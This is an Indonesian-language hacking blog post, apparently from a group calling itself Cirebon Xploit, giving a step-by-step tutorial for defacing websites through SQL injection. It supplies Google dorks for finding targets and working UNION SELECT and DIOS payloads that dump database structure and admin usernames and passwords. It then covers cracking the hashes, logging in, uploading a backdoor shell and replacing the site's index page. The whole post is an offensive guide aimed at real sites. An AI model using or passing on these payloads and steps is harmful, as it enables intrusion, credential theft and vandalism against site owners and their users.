Lompat ke konten Lompat ke sidebar Lompat ke footer

Tutorial Deface Poc Sql Injection

Hallo Sobat Bertemu Lagi Dengan Saya Nekell404. Pada Kesempatan Kali Ini Saya Akan Berbagi Tutorial Deface Poc Sql Injection.

Bahan-Bahannya
- Dork
- Shell backboor
- SC Deface
- internet , kuota , wifi
- kopi , roko

Dork :
- inurl:berita.php?id= site:
- Inurl:content.php?id= site:
- inurl:index.php?id= site:
- inurl:main.php?id= site:

Langsung saja ketutorialnya

Pertama kita Ngedork dulu iyaa ka

Kita cari web yang vuln Sql Injection
Saya sudah menemukan web vuln sql Injection

Lalu kita cek dengan tanda (') atau url %27
Contoh : https://sitekalian.com/berita.php?id=10'
Atau https://sitekalian.com/berita.php?id=10%27
Tidak semua web menggunakan tanda (') atau %27


Jika site berubah tampilan atau error kemungkinan besar vuln
Jika sudah cek vuln apa ngga nya kita lanjut mencari letak angka ajaibnya
Kita Order by dlu
Contoh : https://sitekalian.com/berita.php?id=10'+order+by+1--+-
Atau https://sitekalian.com/berita.php?id=10%27%20order%20by%201--%20-

Kita cari order by smpai error atau berubah tampilan

Nah saya sudah menemukan error nya
Kita lanjut ke Union Select
Contoh : https://sitekalian.com/berita.php?id=10'+union+select+1,2,3,4,5,6--+-
Atau https://sitekalian.com/berita.php?id=10%27%20union%20select%201,2,3,4,5,6--20-

Jika sudah nanti nongol angka ajaib
Kita lanjut menggunakan Dios
Dios : concat('</title>',0x4b697373656420427920556375702d4b756e,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))

Contoh : .https://sitekalian.com/berita.php?id=10'+union+select+1,2,3,4,concat('</title>',0x4b697373656420427920556375702d4b756e,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),6--+-

Jika sudah bakal nongol Dios kalian 
Dan cari username + password Menggunakan Dios dump u/p

Dios Dump U/p : concat('</title>',0x4b697373656420427920556375702d4b756e,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,(/*!50000SELECT*/(@x)FROM(/*!50000SELECT*/(@x:=0x00),(/*!50000SELECT*/(@x)FROM(table_name)WHERE(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x, username,0x203a3a20,password,0x3c62723e))))x))

Contoh : https://sitekalian.com/berita.php?id=10'+union+select+1,2,3,4,concat('</title>',0x4b697373656420427920556375702d4b756e,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database(),0x3c62723e,(/*!50000SELECT*/(@x)FROM(/*!50000SELECT*/(@x:=0x00),(/*!50000SELECT*/(@x)FROM(table_name)WHERE(@x)IN(@x:=/*!50000CONCAT*/(0x20,@x, username,0x203a3a20,password,0x3c62723e))))x)),6--+-

Nah jika sudah ke dump u/p nya kita hash password dlu
Tools hash : https://hashes.com/en/decrypt/hash
Jika sudah terhash password nya kita cari adlognya atau tempat loginannya
Biasanya di login.php atau admin.php
Contoh : https://sitekalian.com/login.php

Jika sudah login kalian cari tempat upload Shell backdor nya 
Biasanya tempatnya di add berita atau add galeri
Tinggal kalian tamper data saja

Jika sudah upload Shell tinggal kalian tebas index atau nitip file saja
Itu saja tutorial dari saya Cirebon Xploit 
Terimakasih
Note : maaf bila tutorialnya tidak jelas atau kurang jelas 
Support by Cirebon Xploit.

Posting Komentar untuk "Tutorial Deface Poc Sql Injection"